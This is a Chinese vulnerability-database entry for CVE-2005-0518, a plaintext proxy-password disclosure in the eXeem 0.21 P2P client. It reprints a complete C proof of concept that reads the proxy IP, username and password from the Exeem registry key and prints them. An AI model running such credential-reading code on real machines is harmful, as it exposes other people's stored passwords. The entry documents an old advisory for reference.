eXeem Exeem注册表键敏感信息泄露漏洞-安全小百科

eXeem Exeem注册表键敏感信息泄露漏洞

漏洞ID	1108475	漏洞类型	未知
发布时间	2005-02-22	更新时间	2005-02-23
CVE编号	CVE-2005-0518	CNNVD-ID	CNNVD-200502-089
漏洞平台	Windows	CVSS评分	2.1

|漏洞来源

https://www.exploit-db.com/exploits/834
https://www.securityfocus.com/bid/90217
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200502-089

|漏洞详情

eXeem是新一代PeerToPeer(P2P)软件。eXeem0.21将密码之类的敏感信息以纯文本格式存储在Exeem注册表键中，这可让本地用户通过获取proxy_user和proxy_password值获取特权。

|漏洞EXP

/*****************************************************************

eXeem v0.21 Local Exploit by Kozan

Application: eXeem v0.21
Vendor: www.exeem.com
Vulnerable Description: eXeem v0.21 discloses passwords
for proxy settings to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com

*****************************************************************/

#include <stdio.h>
#include <windows.h>

#define BUFSIZE 100
HKEY hKey;
char proxy_ip[BUFSIZE],
        proxy_username[BUFSIZE],
        proxy_password[BUFSIZE];

DWORD dwBufLen=BUFSIZE;
LONG lRet;

int main()
{

       if(RegOpenKeyEx(HKEY_CURRENT_USER, "Software\Exeem",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey) == ERROR_SUCCESS)
   {

               lRet = RegQueryValueEx( hKey, "proxy_ip", NULL, NULL,
                                                      (LPBYTE) proxy_ip, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!n");
                                return 0;
                       }

               lRet = RegQueryValueEx( hKey, "proxy_username", NULL, NULL,
                                                      (LPBYTE) proxy_username, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!n");
                                return 0;
                       }

               lRet = RegQueryValueEx( hKey, "proxy_password", NULL, NULL,
                                                      (LPBYTE) proxy_password, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!n");
                                return 0;
                       }

               RegCloseKey(hKey);

               printf("eXeem v0.21 Local Exploit by Kozann");
               printf("Credits to ATmaCAn");
               printf("www.netmagister.com  -  www.spyinstructors.com nn");
               printf("Proxy IP           : %sn",proxy_ip);
               printf("Proxy Username     : %sn",proxy_username);
               printf("Proxy Password     : %sn",proxy_password);

   }
       else
       {
       printf("eXeem v0.21 is not installed on your pc!n");
   }

       return 0;
}

// milw0rm.com [2005-02-22]

|受影响的产品

Exeem Exeem 0.21

|参考资料

来源:SECTRACK
名称:1013266
链接:http://securitytracker.com/id?1013266

相关推荐: Microsoft Internet Explorer DHTML AnchorClick远程拒绝服务攻击漏洞

Microsoft Internet Explorer DHTML AnchorClick远程拒绝服务攻击漏洞漏洞ID 1202867 漏洞类型缓冲区溢出发布时间 2003-05-05 更新时间 2003-12-31 CVE编号 CVE-2003-148…

文章版权归作者所有，未经允许请勿转载。

THE END